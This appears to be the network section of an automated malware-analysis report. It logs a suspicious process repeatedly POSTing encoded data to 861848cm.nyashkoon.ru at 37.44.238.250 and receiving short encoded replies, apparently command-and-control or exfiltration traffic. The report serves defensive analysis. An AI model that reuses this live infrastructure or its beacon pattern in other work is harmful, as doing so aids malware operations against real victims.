                                                                    Data Raw: 00 1e 23 07 28 39 2d 01 24 5d 30 54 2a 2d 31 12 29 30 02 02 2d 21 3b 00 3e 1d 0a 58 2a 2b 3f 0b 23 06 20 06 21 1c 21 1e 23 1c 2c 03 3f 11 21 5f 05 1d 3a 00 27 29 2b 0e 29 0b 31 01 3d 09 33 1b 25 1e 3c 41 28 3b 32 11 20 14 26 1f 26 2d 2e 01 25 21 23 16 2a 34 22 02 3a 01 27 54 25 10 2a 57 09 16 20 12 27 30 2f 11 29 57 27 13 30 3e 39 59 26 14 24 0a 29 3c 24 04 37 1d 35 01 3e 20 37 1c 22 09 3e 5d 27 04 2e 40 31 3e 0a 08 3f 18 26 55 22 0d 20 54 01 30 5d 4f
                                                                    Data Ascii: #(9-$]0T*-1)0-!;>X*+?# !!#,?!_:')+)1=3%<A(;2 &&-.%!#*4":'T%*W '0/)W'0>9Y&$)<$75> 7">]'.@1>?&U" T0]O


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    108192.168.2.45011637.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:38:56.565592051 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:56.922693968 CET1012OUTData Raw: 53 56 5a 58 53 5d 50 5e 5a 5f 52 51 54 5f 5b 52 55 5c 59 57 51 5e 52 52 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: SVZXS]P^Z_RQT_[RU\YWQ^RRQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^&,,2T+^ ^?0<Z):)[5$8/7/(?\9;47*]2'X$.Q-2
                                                                    Nov 6, 2024 03:38:57.383259058 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:57.655921936 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:55 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP
                                                                    Nov 6, 2024 03:38:57.656372070 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:55 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    109192.168.2.45011737.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:38:57.784317970 CET273OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Nov 6, 2024 03:38:58.141700029 CET1012OUTData Raw: 56 50 5a 5c 56 5e 50 53 5a 5f 52 51 54 5e 5b 59 55 51 59 58 51 50 52 5d 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VPZ\V^PSZ_RQT^[YUQYXQPR]QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%];<2=+#>#*5X>-._'((Y ?+9 '&'X$.Q-6
                                                                    Nov 6, 2024 03:38:58.603506088 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:58.678256035 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:56 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    110192.168.2.45011837.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:38:58.813951015 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:59.172717094 CET1012OUTData Raw: 56 51 5f 5c 56 56 50 59 5a 5f 52 51 54 58 5b 5b 55 50 59 5c 51 56 52 59 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VQ_\VVPYZ_RQTX[[UPY\QVRYQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%X/U<+7(0?(92?=:]3$[#<2U(>795 X47._&9'X$.Q-.
                                                                    Nov 6, 2024 03:38:59.630435944 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:59.701581955 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:57 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    111192.168.2.45011937.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:39:00.449150085 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:39:00.807782888 CET1012OUTData Raw: 56 56 5f 5c 56 5b 55 5f 5a 5f 52 51 54 5d 5b 5c 55 53 59 5a 51 51 52 58 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VV_\V[U_Z_RQT][\USYZQQRXQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%/5=8;>#?>9=?.5''4=(-3:%?!7>19'X$.Q-
                                                                    Nov 6, 2024 03:39:01.399779081 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:39:01.399998903 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:59 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP
                                                                    Nov 6, 2024 03:39:01.400011063 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:59 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    112192.168.2.45012037.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:39:01.565989017 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:39:01.922717094 CET1012OUTData Raw: 53 56 5a 55 53 5c 55 59 5a 5f 52 51 54 5d 5b 5a 55 50 59 5a 51 56 52 53 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: SVZUS\UYZ_RQT][ZUPYZQVRSQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%Y,/6R(;4^?3 Y>\)[=*Z'4?*W<>Y96, 7&29'X$.Q-
                                                                    Nov 6, 2024 03:39:02.377213001 CET25INHTTP/1.1 100 Continue


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    113192.168.2.45012137.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:39:02.382942915 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1276
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:39:02.735289097 CET1276OUTData Raw: 53 51 5a 5f 53 58 50 5a 5a 5f 52 51 54 5f 5b 52 55 54 59 5c 51 52 52 53 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: SQZ_SXPZZ_RQT_[RUTY\QRRSQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%^;.+<_+0(9"*>5$/#Y2Q+-/-%##$"&9'X$.Q-2
                                                                    Nov 6, 2024 03:39:03.224968910 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:39:03.300338030 CET308INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:39:01 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive
                                                                    Data Raw: 00 1e 20 59 2b 14 00 5e 27 3b 09 0c 29 10 25 58 28 1e 0e 07 3b 0b 27 06 29 23 2f 01 2b 28 28 50 34 11 0a 07 35 32 29 11 37 1c 20 07 2b 3b 21 5f 05 1d 39 1c 33 07 2b 0d 2a 0b 2d 00 29 27 2c 43 25 23 3f 19 29 2b 36 1e 34 3a 2a 1c 31 2d 3e 05 32 31 2b 55 2a 34 39 15 2e 3f 3b 51 32 3a 2a 57 09 16 20 50 27 1d 38 03 29 08 3b 5e 27 00 21 13 26 5c 23 11 29 12 33 5b 23 0a 04 15 2a 0d 2c 07 23 37 2a 5c 24 2a 2d 1a 31 3d 2b 19 28 08 26 55 22 0d 20 54 01 30 5d 4f
                                                                    Data Ascii: Y+^';)%X(;')#/+((P452)7 +;!_93+*-)',C%#?)+64:*1->21+U*49.?;Q2:*W P'8);^'!&\#)3[#*,#7*\$*-1=+(&U" T0]O


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    114192.168.2.45012237.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:39:02.708014965 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:39:03.063471079 CET1012OUTData Raw: 56 53 5f 5e 56 5d 50 5f 5a 5f 52 51 54 59 5b 5a 55 56 59 59 51 5f 52 53 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VS_^V]P_Z_RQTY[ZUVYYQ_RSQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%,R(+(_+0#*-_>&$X#,&<>+:$Y ')'X$.Q-*
                                                                    Nov 6, 2024 03:39:03.518095016 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:39:03.585042000 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:39:01 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    115192.168.2.45012337.44.238.250808152C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:39:03.705976009 CET273OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Nov 6, 2024 03:39:04.063492060 CET1012OUTData Raw: 56 51 5a 5c 56 59 50 53 5a 5f 52 51 54 5f 5b 58 55 54 59 5d 51 52 52 52 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VQZ\VYPSZ_RQT_[XUTY]QRRRQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%;5?(?+)&?=.3#4)+=7Z-C/#>%9'X$.Q-2
                                                                    Nov 6, 2024 03:39:04.524857998 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:39:04.614190102 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:39:02 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    116192.168.2.45012437.44.238.25080
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:39:04.736673117 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:39:05.094713926 CET1012OUTData Raw: 56 52 5f 58 56 5b 55 5e 5a 5f 52 51 54 5c 5b 5f 55 51 59 5c 51 56 52 5c 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: VR_XV[U^Z_RQT\[_UQY\QVR\QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^&-?1<8]<#>-_)6\'X4Y&W?>/-&0Y7&)'X$.Q->
                                                                    Nov 6, 2024 03:39:05.554753065 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:39:05.630374908 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:39:03 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    117192.168.2.45012537.44.238.25080
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:39:05.753454924 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:39:06.110245943 CET1012OUTData Raw: 53 55 5f 5c 56 58 50 5d 5a 5f 52 51 54 5b 5b 5b 55 5c 59 5f 51 56 52 5a 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: SU_\VXP]Z_RQT[[[U\Y_QVRZQV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%8"<<X(3$[)\1_?-"$ [ ?.(.%3!'^%)'X$.Q-"
                                                                    Nov 6, 2024 03:39:06.572362900 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:39:06.645905018 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:39:04 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    118192.168.2.45012637.44.238.25080
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:39:06.767365932 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:39:07.125850916 CET1012OUTData Raw: 53 55 5a 5f 53 5c 55 5e 5a 5f 52 51 54 5f 5b 5c 55 57 59 59 51 51 52 5c 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: SUZ_S\U^Z_RQT_[\UWYYQQR\QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%,,2<^?$>-==\$; &?X#].%X &_&)'X$.Q-2
                                                                    Nov 6, 2024 03:39:07.585681915 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:39:07.664144993 CET158INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:39:05 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    119192.168.2.45012737.44.238.25080
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:39:07.781730890 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:39:08.125845909 CET1012OUTData Raw: 53 56 5f 5f 53 5a 50 5f 5a 5f 52 51 54 5c 5b 5c 55 5d 59 56 51 52 52 5e 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: SV__SZP_Z_RQT\[\U]YVQRR^QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%Y8?=8 <04>1^*>*$8#,"<./\.%0X '!&9'X$.Q->


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    120192.168.2.45012837.44.238.25080
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:39:08.323539972 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1276
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:39:08.672713041 CET1276OUTData Raw: 53 51 5f 58 56 5c 50 5b 5a 5f 52 51 54 5e 5b 5e 55 55 59 5b 51 53 52 5c 51 56 5f 5b 57 59 5a 54 5b 5a 50 58 5f 53 57 5d 5d 53 59 5f 55 5d 5e 5c 53 51 43 5d 5f 5c 56 50 52 57 50 58 54 56 56 4b 5b 51 5e 40 54 5a 50 5c 5b 5f 5c 51 5d 5b 5e 5a 5b 53
                                                                    Data Ascii: SQ_XV\P[Z_RQT^[^UUY[QSR\QV_[WYZT[ZPX_SW]]SY_U]^\SQC]_\VPRWPXTVVK[Q^@TZP\[_\Q][^Z[SUTVE__P[\V[ZPX_]ZR\VY\T]Y^Y[CYX\YVCQYXXB\TWP]Y_U][Z\]EX_PQU@\PXS\^Q\[@CU_[[DUXBQYD[XURTP[_XVZXGY]V\SP^%,6W((Y?4Y):_>3 !(>4. X :%9'X$.Q-6
                                                                    Nov 6, 2024 03:39:09.165200949 CET25INHTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:39:09.242007017 CET308INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:39:07 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive
                                                                    Data Raw: 00 1e 20 15 2b 14 22 59 24 02 37 0a 2a 58 22 07 29 30 3b 5a 3b 0b 2c 5a 3e 0d 3b 01 3d 3b 2c 18 20 11 2c 04 35 54 32 03 37 54 23 1d 28 01 21 5f 05 1d 39 1c 33 29 28 57 3e 32 35 06 29 27 09 19 26 09 3c 08 29 2b 25 00 23 14 39 0b 24 2e 32 01 26 32 0a 0b 3f 37 35 5a 2c 2c 27 1f 26 3a 2a 57 09 16 23 0c 33 30 3f 1c 2a 08 2f 5e 30 2e 22 03 32 39 27 1f 3e 02 23 10 34 27 3d 06 3e 0a 3b 59 22 19 2a 5a 30 39 21 19 24 3e 2c 0f 28 22 26 55 22 0d 20 54 01 30 5d 4f
                                                                    Data Ascii: +"Y$7*X")0;Z;,Z>;=;, ,5T27T#(!_93)(W>25)'&<)+%#9$.2&2?75Z,,'&:*W#30?*/^0."29'>#4'=>;Y"*Z09!$>,("&U" T0]O


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    121192.168.2.45012937.44.238.25080
                                                                    TimestampBytes transferredDirectionData
                                                                    Nov 6, 2024 03:39:08.441555977 CET297OUTPOST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
